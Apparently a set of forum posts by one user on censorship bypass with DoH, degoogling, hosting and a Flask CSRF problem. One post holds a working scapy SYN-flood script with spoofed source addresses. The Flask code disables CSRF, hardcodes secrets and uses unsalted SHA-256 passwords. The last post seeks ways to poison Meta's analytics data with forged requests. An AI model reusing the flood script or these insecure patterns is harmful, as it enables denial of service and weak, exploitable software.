hello,

TLDR: just enable DoH

Today, my friend and I were talking about SNI and deep packet analysis shit done by the government. I insisted that since they do this kind of shit they can block access to certain sites like TPB and other freedom websites. he suggested that I just enable DoH in firefox and see the magic happen. I didn't believe him until I enabled DoH and magic. I can access every censored website.

so just saying that sometimes the bypass is much simpler than we think!

also I am thinking that even if the DNS request is encrypted cant they see the TLS client hello message and block it? or is it impossible?

apparently you cant use an alias

Hello,

I have decided to degoogle myself however I am wondering there are some services which I use which only allows google login. so like what can do about it? also does android run without google account?

Hello,

I have been hosting my project on vercel and I really don't like it at least the free version. so I wanted ask is there any open source and free alterantive of vercel. of course I won't be hosting the production server there but I don't want to pay for it when I am developing it.

Thanks in advance <3

I have seen a lot post talking about how Chinese companies collect US citizens data but I never seen a Chinese person complain about it. Do they think US doesn't have the power to abuse that data?

Really curious

Hello,

I am thinking about teaching my students JavaScript first so that they can start creating websites and make their career, what are your thoughts?

I know it's very old now but I still didn't know about this kind of low level attack. I don't even know if it works or not but I still found it interesting.

from scapy.all import *
import random

target_ip = "192.168.1.1"
target_port = 80

def syn_flood():
    while True:
        # Randomize source IP and port
        src_ip = ".".join(map(str, (random.randint(0,255) for _ in range(4))))
        src_port = random.randint(1024, 65535)
        
        ip = IP(src=src_ip, dst=target_ip)
        tcp = TCP(sport=src_port, dport=target_port, flags="S")
        
        send(ip/tcp, verbose=0)

syn_flood()  # Uncomment to run (requires proper authorization)

Hello,

it seems like an easy question but I tried everything google and AI told me but flask still giving me CSRF token mismatched error. I don't know how to disable it. I threw everything I found online to disable CSRF but I can't disable it. it's so annoying. here is the code:

import mysql.connector
from mysql.connector import Error

from flask import Flask, request, jsonify,redirect, url_for
from authlib.integrations.flask_client import OAuth
import os
from flask_cors import CORS
from flask_jwt_extended import JWTManager, create_access_token, jwt_required, get_jwt_identity
# from flask_wtf.csrf import csrf_exempt

import hashlib
from flask import Flask
from flask_wtf import CSRFProtect

app = Flask(__name__)
app.config['WTF_CSRF_ENABLED'] = False  # Disable CSRF globally

csrf = CSRFProtect(app)  # This will now be disabled


try:
    print("TESTING CONNECTION TO MYSQL DATABASE...")
    connection = mysql.connector.connect(
        host='localhost',
        database='test',
        user='root',
        password='MySql@123'
    )

    if connection.is_connected():
        print("Connected to MySQL database")

        cur = connection.cursor()
        cur.execute("SELECT DATABASE();")
        record = cur.fetchone()
        print("You're connected to database: ", record)
except Error as e:
    print("Error while connecting to MySQL", e)
    exit(1)
finally:
    if connection.is_connected():
        cur.close()
        connection.close()
        print("MySQL connection is closed")
        print("TESTING DONE")


app.secret_key = "somethings_secret92387492837492387498"
app.config['SESSION_COOKIE_SAMESITE'] = 'Lax'
app.config['SESSION_COOKIE_SECURE'] = False
app.config['SESSION_COOKIE_HTTPONLY'] = True

CORS(app)
app.config['JWT_SECRET_KEY'] = "your_jwt_secret_key123487236428374628374628736"
jwt = JWTManager(app)


# OAuth configuration
oauth = OAuth(app)
google = oauth.register(
    name='google',
    client_id="CLIENT_ID",
    client_secret="CLIENT_SECRET",
    server_metadata_url='https://accounts.google.com/.well-known/openid-configuration',
    client_kwargs={
        'scope': 'openid email profile'
    }
)

@app.errorhandler(Exception)
def handle_exception(e):
    return jsonify({"error": str(e)}), 500

@app.route("/",)
@jwt_required()
def hello_world():
    return "<p>Hello, World!</p>"

@app.route("/register_by_email", methods=["POST"])
def register():
    username = request.form.get("username")
    email = request.form.get("email")
    password = request.form.get("password")

    with mysql.connector.connect(
        host='localhost',
        database='test',
        user='root',
        password='MySql@123'
    ) as connection:
        with connection.cursor() as cursor:
            cursor.execute("INSERT INTO users (username, email) VALUES (%s, %s)", (username, email))
            cursor.execute("SELECT LAST_INSERT_ID()")
            user_id = cursor.fetchone()[0]
            password_hash = hashlib.sha256(password.encode()).hexdigest()
            cursor.execute("INSERT INTO user_passwords (user_id, password_hash) VALUES (%s, %s)", (user_id, password_hash))
            connection.commit()
    return jsonify({"message": "User registered successfully", "user_id": user_id}), 201

@app.route("/login_by_email", methods=["POST"])
def login():
    email = request.form.get("email")
    password = request.form.get("password")

    with mysql.connector.connect(
        host='localhost',
        database='test',
        user='root',
        password='MySql@123'
    ) as connection:
        with connection.cursor() as cursor:
            cursor.execute("SELECT id FROM users WHERE email = %s", (email,))
            user = cursor.fetchone()
            if not user:
                return jsonify({"error": "User not found"}), 404
            user_id = user[0]
            password_hash = hashlib.sha256(password.encode()).hexdigest()
            cursor.execute("SELECT * FROM user_passwords WHERE user_id = %s AND password_hash = %s", (user_id, password_hash))
            if cursor.fetchone():
                return jsonify({"message": "Login successful", "user_id": user_id, "access_token": create_access_token(identity=email)}), 200
            else:
                return jsonify({"error": "Invalid credentials"}), 401


@app.route("/google_oauth_url",methods = ["GET"])
def login_with_google():
    redirect_uri = url_for('callback', _external=True)
    return google.create_authorization_url(redirect_uri)




@app.route("/callback",methods = ["GET"])
# @csrf_exempt
def callback():
    token = google.authorize_access_token()
    user_info = token.get("userinfo")

    return jsonify(user_info)

if __name__ == "__main__":
    app.run(debug=True)

Hello,

yes, I use Instagram even though I don’t like it because well all of my friends does and I can’t convince them to use something else. it’s really sad how hard it is to convince people to join open networks specially in fascist country like India where people are just boot lickers of politicians and rich people. but I digress.

I found the other day that google analytics can be easily tricked since it doesn’t verify the input. you can just open network tab and watch for any request going to https://www.google-analytics.com/ and just copy that request as curl command now you can tweak the parameters of the query and it will just accept it. ig, you can say I have 1920x1080 monitor and google will just accept it. it’s an effective way to fill up google analytics with garbage data to the point that it’s harder to separate real data from the garbage data.

now I want to know if there is something similar to poison data of Instagram/Facebook/Meta. I opened network tab on instagram.com but couldn’t find anything interesting.

any help would be appreciated! :)